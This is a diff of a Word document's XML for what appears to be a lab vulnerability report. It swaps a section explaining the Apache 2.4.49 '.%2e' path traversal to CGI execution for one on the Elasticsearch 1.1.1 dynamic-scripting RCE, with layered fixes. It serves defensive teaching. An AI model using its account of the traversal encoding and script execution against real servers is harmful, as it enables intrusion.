+        </w:rPr>
+        <w:t>the API as privileged; on the network there is no credential at all, which is</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>why the effective attack is pre-auth RCE.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Blast radius.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The node runs as root in this image, so the first command</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>already has full control: read the data directory, reach the network, or</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>exhaust the heap.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>The defect is therefore an access-control failure around a dangerous capability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>(CWE-284): code evaluation was treated as an ordinary data field. Every later</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>fix is a way of taking that capability away from the client.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>[[SCREENSHOT: elasticsearch.yml showing script.disable_dynamic absent / default]]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>8. Applied fix</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Three layers, weakest to strongest (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>vulnerability/hardened/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>vulnerability/fixed/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Configuration (mitigation)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>script.disable_dynamic: true</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on the same</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>1.1.1 image. The node refuses to compile scripts arriving in a request; the</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">search fails with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ScriptException[dynamic scripting disabled]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Patch (upgrade)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — Elasticsearch 1.4.4. Dynamic scripting has been off by</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>default since 1.2, and 1.4 adds a Groovy sandbox that filters classes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Design</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — do not expose the scripting API to clients at all: network ACL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a reverse proxy that rejects </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>source</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in requests, or Elasticsearch</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>≥ 2.0, where dynamic scripting was removed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3856,13 +4291,16 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="17"/>
         </w:rPr>
-        <w:t>if (!seg_start || strcmp(seg_start, "..") == 0) {</w:t>
+        <w:t># hardened/</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    if (path == path_start) return 0;   /* would leave the root */</w:t>
+        <w:t>FROM vulhub/elasticsearch:1.1.1</w:t>
         <w:br/>
-        <w:t xml:space="preserve">    path--;                             /* drop the previous segment */</w:t>
+        <w:t>RUN echo "script.disable_dynamic: true" &gt;&gt; /usr/share/elasticsearch/config/elasticsearch.yml</w:t>
         <w:br/>
-        <w:t>}</w:t>
+        <w:br/>
+        <w:t># fixed/</w:t>
+        <w:br/>
+        <w:t>FROM vulhub/elasticsearch:1.4.4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3875,22 +4313,20 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">The error is one of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>ordering</w:t>
-      </w:r>
+        <w:t>Why this is effective: layer 1 removes the primitive ("compile what the client</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>: the comparison is made against the *still</w:t>
+        <w:t>sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3903,7 +4339,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>percent-encoded* segment, while decoding happens later in the same pass.</w:t>
+        <w:t>the reachable surface. A nuance worth stating in the report: **1.4.4 is not the</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3916,41 +4352,33 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Take the segment </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.%2e</w:t>
-      </w:r>
+        <w:t>end of the story** — in 2015 the 1.4.x sandbox was bypassed again</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>:</w:t>
+        <w:t>(CVE-2015-1427, Groovy sandbox escape) and 1.4.4 is still in that affected</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>strcmp(".%2e", "..") != 0</w:t>
-      </w:r>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>, so the "cannot go above the root" branch is not</w:t>
+        <w:t>range. That is precisely why the design layer is the durable one: "no</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3963,324 +4391,20 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>taken and the segment looks like an ordinary file name.</w:t>
+        <w:t>client-supplied scripts" survives the next clever expression, while a sandbox</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">The decoder then turns </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>%2e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> into </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, so the segment becomes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>ap_core_translate()</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> joins the result to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>DocumentRoot</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and the filesystem</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">resolves the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — the path escapes the web root.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This is why the exploit uses the odd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.%2e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> spelling: a plain </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>../</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is caught by</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>the check; the encoded variant is not. The defect is a validate-before-normalise</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>logic error, not a missing check.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>The configuration makes the impact worse:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>&lt;Directory /&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> was set to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Require all granted</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>, so paths outside the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>document root are authorised at all;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>mod_cgi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>mod_cgid</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> are loaded, so the traversed </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>/bin/sh</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is *executed*</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>instead of merely disclosed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: docker-compose/Dockerfile showing 2.4.49 + Require all granted + CGI]]</w:t>
+        <w:t>has to be perfect every time.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4293,7 +4417,7 @@
           <w:color w:val="000000"/>
           <w:sz w:val="26"/>
         </w:rPr>
-        <w:t>8. Applied fix</w:t>
+        <w:t>9. Proof that the vulnerability is eliminated</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4306,288 +4430,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Three independent layers (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>vulnerability/fixed/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Patch the software</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — base image </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>httpd:2.4.51</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>. The corrected normaliser</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">decodes first and validates afterwards, so </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>.%2e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> can no longer hide a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>2.4.51 rather than 2.4.50, because 2.4.50 still allowed a variant bypass</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
